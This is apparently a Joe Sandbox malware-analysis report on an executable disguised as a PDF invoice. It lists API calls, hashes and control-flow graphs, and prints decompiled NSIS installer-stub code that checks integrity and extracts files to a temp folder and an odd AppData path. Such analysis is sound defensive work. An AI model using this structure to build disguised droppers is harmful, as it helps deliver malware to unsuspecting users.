                                                                      0x00000000
                                                                      0x00403e65
                                                                      0x00403e6b
                                                                      0x00403e75
                                                                      0x00404280
                                                                      0x00404286
                                                                      0x00404293
                                                                      0x00404299
                                                                      0x00404299
                                                                      0x004042a3
                                                                      0x00000000
                                                                      0x004042a3
                                                                      0x00403e63

                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E3A
                                                                      • ShowWindow.USER32(?), ref: 00403E57
                                                                      • DestroyWindow.USER32 ref: 00403E6B
                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403E87
                                                                      • GetDlgItem.USER32(?,?), ref: 00403EA8
                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBC
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403EC3
                                                                      • GetDlgItem.USER32(?,?), ref: 00403F71
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403F7B
                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403F95
                                                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403FE6
                                                                      • GetDlgItem.USER32(?,00000003), ref: 0040408C
                                                                      • ShowWindow.USER32(00000000,?), ref: 004040AD
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040BF
                                                                      • EnableWindow.USER32(?,?), ref: 004040DA
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004040F0
                                                                      • EnableMenuItem.USER32(00000000), ref: 004040F7
                                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040410F
                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404122
                                                                      • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 0040414B
                                                                      • SetWindowTextW.USER32(?,00423728), ref: 0040415F
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404293
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                      • String ID: (7B
                                                                      • API String ID: 3282139019-3251261122
                                                                      • Opcode ID: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
                                                                      • Instruction ID: fc2721e09aaab4c72f4ebfdf2c157598dee1e076b88a1be66e463b94688f5fa6
                                                                      • Opcode Fuzzy Hash: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
                                                                      • Instruction Fuzzy Hash: 6BC1C2B1600201FFCB21AF61ED85E2B3AB9EB95345F40057EFA41B11F0CB7998529B2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403A5B Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 287 403a5b-403a73 call 4065ec 290 403a75-403a80 GetUserDefaultUILanguage call 406159 287->290 291 403a87-403abe call 4060df 287->291 294 403a85 290->294 297 403ac0-403ad1 call 4060df 291->297 298 403ad6-403adc lstrcatW 291->298 296 403ae1-403b0a call 403d31 call 405cce 294->296 304 403b10-403b15 296->304 305 403b9c-403ba4 call 405cce 296->305 297->298 298->296 304->305 306 403b1b-403b43 call 4060df 304->306 311 403bb2-403bd7 LoadImageW 305->311 312 403ba6-403bad call 406234 305->312 306->305 313 403b45-403b49 306->313 315 403c58-403c60 call 40140b 311->315 316 403bd9-403c09 RegisterClassW 311->316 312->311 317 403b5b-403b67 lstrlenW 313->317 318 403b4b-403b58 call 405bf3 313->318 327 403c62-403c65 315->327 328 403c6a-403c75 call 403d31 315->328 319 403d27 316->319 320 403c0f-403c53 SystemParametersInfoW CreateWindowExW 316->320 324 403b69-403b77 lstrcmpiW 317->324 325 403b8f-403b97 call 405bc6 call 406212 317->325 318->317 323 403d29-403d30 319->323 320->315 324->325 331 403b79-403b83 GetFileAttributesW 324->331 325->305 327->323 339 403c7b-403c95 ShowWindow call 40657c 328->339 340 403cfe-403cff call 405444 328->340 334 403b85-403b87 331->334 335 403b89-403b8a call 405c12 331->335 334->325 334->335 335->325 347 403ca1-403cb3 GetClassInfoW 339->347 348 403c97-403c9c call 40657c 339->348 343 403d04-403d06 340->343 345 403d20-403d22 call 40140b 343->345 346 403d08-403d0e 343->346 345->319 346->327 349 403d14-403d1b call 40140b 346->349 352 403cb5-403cc5 GetClassInfoW RegisterClassW 347->352 353 403ccb-403cee DialogBoxParamW call 40140b 347->353 348->347 349->327 352->353 357 403cf3-403cfc call 4039ab 353->357 357->323
                                                                      C-Code - Quality: 96%
                                                                      			E00403A5B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a250;
				_t22 = E004065EC(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423728;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E004060DF(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423728, 0);
					__eflags =  *0x423728;
					if(__eflags == 0) {
						E004060DF(0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423728, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E00406159(L"1033", _t73 & 0x0000ffff);
				}
				E00403D31(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Deskriptiv155\\Hjertere";
				 *0x42a2c0 =  *0x42a258 & 0x00000020;
				 *0x42a2dc = 0x10000;
				if(E00405CCE(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Deskriptiv155\\Hjertere") != 0) {
					L16:
					if(E00405CCE(_t98, _t86) == 0) {
						E00406234(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a240, 0x67, "true", 0, 0, 0x8040); // executed
					 *0x429228 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403D31(_t78, __eflags);
							__eflags =  *0x42a2e0;
							if( *0x42a2e0 != 0) {
								_t33 = E00405444(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B("true");
									goto L33;
								}
								__eflags =  *0x42920c;
								if( *0x42920c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423708, 5); // executed
							_t39 = E0040657C("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040657C("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291e0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291e0);
								 *0x429204 = _t87;
								RegisterClassW(0x4291e0);
							}
							_t44 = DialogBoxParamW( *0x42a240,  *0x429220 + 0x00000069 & 0x0000ffff, 0, E00403DFE, 0); // executed
							E004039AB(E0040140B(5), "true");
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a240;
						 *0x4291e4 = E00401000;
						 *0x4291f0 =  *0x42a240;
						 *0x4291f4 = _t30;
						 *0x429204 = 0x40a3b4;
						if(RegisterClassW(0x4291e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423708 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a240, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					if( *(_t82 + 0x48) == 0) {
						goto L16;
					}
					_t76 = 0x4281e0;
					E004060DF( *((intOrPtr*)(_t82 + 0x44)),  *0x42a278 + _t78 * 2,  *0x42a278 +  *(_t82 + 0x4c) * 2, 0x4281e0, 0);
					_t63 =  *0x4281e0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281e2;
						 *((short*)(E00405BF3(0x4281e2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406212(_t86, E00405BC6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405C12(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                      0x00403a61
                                                                      0x00403a6a
                                                                      0x00403a71
                                                                      0x00403a73
                                                                      0x00403a87
                                                                      0x00403a99
                                                                      0x00403aa2
                                                                      0x00403aab
                                                                      0x00403ab2
                                                                      0x00403ab7
                                                                      0x00403abe
                                                                      0x00403ad1
                                                                      0x00403ad1
                                                                      0x00403adc
                                                                      0x00403a75
                                                                      0x00403a75
                                                                      0x00403a80
                                                                      0x00403a80
                                                                      0x00403ae1
                                                                      0x00403aeb
                                                                      0x00403af4
                                                                      0x00403af9
                                                                      0x00403b0a
                                                                      0x00403b9c
                                                                      0x00403ba4
                                                                      0x00403bad
                                                                      0x00403bad
                                                                      0x00403bc3
                                                                      0x00403bc9
                                                                      0x00403bd7
                                                                      0x00403c58
                                                                      0x00403c60
                                                                      0x00403c6a
                                                                      0x00403c6f
                                                                      0x00403c75
                                                                      0x00403cff
                                                                      0x00403d04
                                                                      0x00403d06
                                                                      0x00403d22
                                                                      0x00000000
                                                                      0x00403d22
                                                                      0x00403d08
                                                                      0x00403d0e
                                                                      0x00403d16
                                                                      0x00403d16
                                                                      0x00000000
                                                                      0x00403d0e
                                                                      0x00403c83
                                                                      0x00403c8e
                                                                      0x00403c93
                                                                      0x00403c95
                                                                      0x00403c9c
                                                                      0x00403c9c
                                                                      0x00403ca7
                                                                      0x00403caf
                                                                      0x00403cb1
                                                                      0x00403cb3
                                                                      0x00403cbc
                                                                      0x00403cbf
                                                                      0x00403cc5
                                                                      0x00403cc5
                                                                      0x00403ce4
                                                                      0x00403cf5
                                                                      0x00000000
                                                                      0x00403cfa
                                                                      0x00403c62
                                                                      0x00403c64
                                                                      0x00000000
                                                                      0x00403bd9
                                                                      0x00403bd9
                                                                      0x00403be5
                                                                      0x00403bef
                                                                      0x00403bf5
                                                                      0x00403bfa
                                                                      0x00403c09
                                                                      0x00403d27
                                                                      0x00403d27
                                                                      0x00000000
                                                                      0x00403d27
                                                                      0x00403c18
                                                                      0x00403c53
                                                                      0x00000000
                                                                      0x00403c53
                                                                      0x00403b10
                                                                      0x00403b10
                                                                      0x00403b15
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403b23
                                                                      0x00403b35
                                                                      0x00403b3a
                                                                      0x00403b43
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403b49
                                                                      0x00403b4b
                                                                      0x00403b58
                                                                      0x00403b58
                                                                      0x00403b61
                                                                      0x00403b67
                                                                      0x00403b8f
                                                                      0x00403b97
                                                                      0x00000000
                                                                      0x00403b79
                                                                      0x00403b7a
                                                                      0x00403b83
                                                                      0x00403b89
                                                                      0x00403b8a
                                                                      0x00000000
                                                                      0x00403b8a
                                                                      0x00403b85
                                                                      0x00403b87
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403b87
                                                                      0x00403b67

                                                                      APIs
                                                                        • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                                        • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,76A63420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe",00000000), ref: 00403A75
                                                                        • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
                                                                      • lstrcatW.KERNEL32(1033,00423728), ref: 00403ADC
                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Deskriptiv155\Hjertere,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,76A63420), ref: 00403B5C
                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Deskriptiv155\Hjertere,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403B6F
                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403B7A
                                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Deskriptiv155\Hjertere), ref: 00403BC3
                                                                      • RegisterClassW.USER32(004291E0), ref: 00403C00
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C18
                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C4D
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403C83
                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403CAF
                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403CBC
                                                                      • RegisterClassW.USER32(004291E0), ref: 00403CC5
                                                                      • DialogBoxParamW.USER32(?,00000000,00403DFE,00000000), ref: 00403CE4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Deskriptiv155\Hjertere$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                      • API String ID: 606308-1142654447
                                                                      • Opcode ID: 0ee41304b45ea222ab407853068b800f5013aa7f596612d197709f65786b57e8
                                                                      • Instruction ID: a49deb01357f173a4aad96dc60f9d02752f373419f451c4cfac2514e29acbaba
                                                                      • Opcode Fuzzy Hash: 0ee41304b45ea222ab407853068b800f5013aa7f596612d197709f65786b57e8
                                                                      • Instruction Fuzzy Hash: ED61C370240300BAD620AF669D45E2B3A7CEB84749F40457EF941B22E2DB7D9D52CA2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402ED5 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 360 402ed5-402f23 GetTickCount GetModuleFileNameW call 405de7 363 402f25-402f2a 360->363 364 402f2f-402f5d call 406212 call 405c12 call 406212 GetFileSize 360->364 365 403174-403178 363->365 372 402f63-402f7a 364->372 373 40304d-40305b call 402e33 364->373 375 402f7c 372->375 376 402f7e-402f8b call 4033ec 372->376 379 403061-403064 373->379 380 40312c-403131 373->380 375->376 384 402f91-402f97 376->384 385 4030e8-4030f0 call 402e33 376->385 382 403090-4030dc GlobalAlloc call 40670b call 405e16 CreateFileW 379->382 383 403066-40307e call 403402 call 4033ec 379->383 380->365 409 4030f2-403122 call 403402 call 40317b 382->409 410 4030de-4030e3 382->410 383->380 412 403084-40308a 383->412 389 403017-40301b 384->389 390 402f99-402fb1 call 405da2 384->390 385->380 395 403024-40302a 389->395 396 40301d-403023 call 402e33 389->396 390->395 405 402fb3-402fba 390->405 397 40302c-40303a call 40669d 395->397 398 40303d-403047 395->398 396->395 397->398 398->372 398->373 405->395 411 402fbc-402fc3 405->411 420 403127-40312a 409->420 410->365 411->395 413 402fc5-402fcc 411->413 412->380 412->382 413->395 415 402fce-402fd5 413->415 415->395 417 402fd7-402ff7 415->417 417->380 419 402ffd-403001 417->419 421 403003-403007 419->421 422 403009-403011 419->422 420->380 423 403133-403144 420->423 421->373 421->422 422->395 424 403013-403015 422->424 425 403146 423->425 426 40314c-403151 423->426 424->395 425->426 427 403152-403158 426->427 427->427 428 40315a-403172 call 405da2 427->428 428->365
                                                                      C-Code - Quality: 99%
                                                                      			E00402ED5(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42a24c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe", 0x400);
				_t105 = E00405DE7(L"C:\\Users\\Arthur\\Desktop\\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe", 0x80000000, 3);
				 *0x40a018 = _t105;
				if(_t105 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406212(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe");
				E00406212(0x439000, E00405C12(L"C:\\Users\\Arthur\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x418ee0 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E33("true");
					__eflags =  *0x42a254;
					if( *0x42a254 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E0040670B(0x40ce48);
						E00405E16(0x40ce48,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403402( *0x42a254 + 0x1c);
							 *0x418ee4 = _t65;
							 *0x418ed8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E0040317B(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a250 = _t110;
								 *0x42a258 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a25c =  *0x42a25c + 1;
									__eflags =  *0x42a25c;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x418ed4; // 0x484e3
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405DA2(0x42a260, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403402( *0x418ed0);
					_t77 = E004033EC( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a254) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004033EC(0x418ee8, _t106);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402E33("true");
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a254;
						if( *0x42a254 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E33(0);
							}
							goto L19;
						}
						E00405DA2( &_v40, 0x418ee8, "true");
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x418ed0; // 0x39b2b
						 *0x42a2e0 =  *0x42a2e0 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x42a254 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x418ee0; // 0x3c883
						if(__eflags < 0) {
							_v8 = E0040669D(_v8, 0x418ee8, _t106);
						}
						 *0x418ed0 =  *0x418ed0 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}































                                                                      0x00402ee3
                                                                      0x00402ee6
                                                                      0x00402f00
                                                                      0x00402f05
                                                                      0x00402f18
                                                                      0x00402f1d
                                                                      0x00402f23
                                                                      0x00000000
                                                                      0x00402f25
                                                                      0x00402f36
                                                                      0x00402f47
                                                                      0x00402f4e
                                                                      0x00402f54
                                                                      0x00402f56
                                                                      0x00402f5b
                                                                      0x00402f5d
                                                                      0x0040304d
                                                                      0x0040304f
                                                                      0x00403054
                                                                      0x0040305b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403061
                                                                      0x00403064
                                                                      0x00403090
                                                                      0x00403095
                                                                      0x004030a0
                                                                      0x004030a2
                                                                      0x004030b3
                                                                      0x004030ce
                                                                      0x004030d4
                                                                      0x004030d7
                                                                      0x004030dc
                                                                      0x004030fb
                                                                      0x0040310b
                                                                      0x0040311d
                                                                      0x00403122
                                                                      0x00403127
                                                                      0x0040312a
                                                                      0x00403133
                                                                      0x00403137
                                                                      0x0040313f
                                                                      0x00403144
                                                                      0x00403146
                                                                      0x00403146
                                                                      0x00403146
                                                                      0x0040314e
                                                                      0x0040314e
                                                                      0x00403151
                                                                      0x00403152
                                                                      0x00403152
                                                                      0x00403155
                                                                      0x00403157
                                                                      0x00403157
                                                                      0x00403157
                                                                      0x0040315a
                                                                      0x00403161
                                                                      0x0040316d
                                                                      0x00403172
                                                                      0x00000000
                                                                      0x00403172
                                                                      0x00000000
                                                                      0x0040312a
                                                                      0x00000000
                                                                      0x004030de
                                                                      0x0040306c
                                                                      0x00403077
                                                                      0x0040307c
                                                                      0x0040307e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403087
                                                                      0x0040308a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402f63
                                                                      0x00402f63
                                                                      0x00402f68
                                                                      0x00402f6c
                                                                      0x00402f73
                                                                      0x00402f78
                                                                      0x00402f7a
                                                                      0x00402f7c
                                                                      0x00402f7c
                                                                      0x00402f84
                                                                      0x00402f89
                                                                      0x00402f8b
                                                                      0x004030ea
                                                                      0x0040312c
                                                                      0x00000000
                                                                      0x0040312c
                                                                      0x00402f91
                                                                      0x00402f97
                                                                      0x00403017
                                                                      0x0040301b
                                                                      0x0040301e
                                                                      0x00403023
                                                                      0x00000000
                                                                      0x0040301b
                                                                      0x00402fa4
                                                                      0x00402fa9
                                                                      0x00402fac
                                                                      0x00402fb1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402fb3
                                                                      0x00402fba
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402fbc
                                                                      0x00402fc3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402fc5
                                                                      0x00402fcc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402fce
                                                                      0x00402fd5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402fd7
                                                                      0x00402fdd
                                                                      0x00402fe6
                                                                      0x00402fec
                                                                      0x00402fef
                                                                      0x00402ff1
                                                                      0x00402ff7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402ffd
                                                                      0x00403001
                                                                      0x00403009
                                                                      0x00403009
                                                                      0x0040300c
                                                                      0x0040300f
                                                                      0x00403011
                                                                      0x00403013
                                                                      0x00403013
                                                                      0x00000000
                                                                      0x00403011
                                                                      0x00403003
                                                                      0x00403007
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403024
                                                                      0x00403024
                                                                      0x0040302a
                                                                      0x0040303a
                                                                      0x0040303a
                                                                      0x0040303d
                                                                      0x00403043
                                                                      0x00403045
                                                                      0x00403045
                                                                      0x00000000
                                                                      0x00402f63

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402EE9
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe,00000400), ref: 00402F05
                                                                        • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe,80000000,00000003), ref: 00405DEB
                                                                        • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405E0D
                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe,C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe,80000000,00000003), ref: 00402F4E
                                                                      • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403095
                                                                      Strings
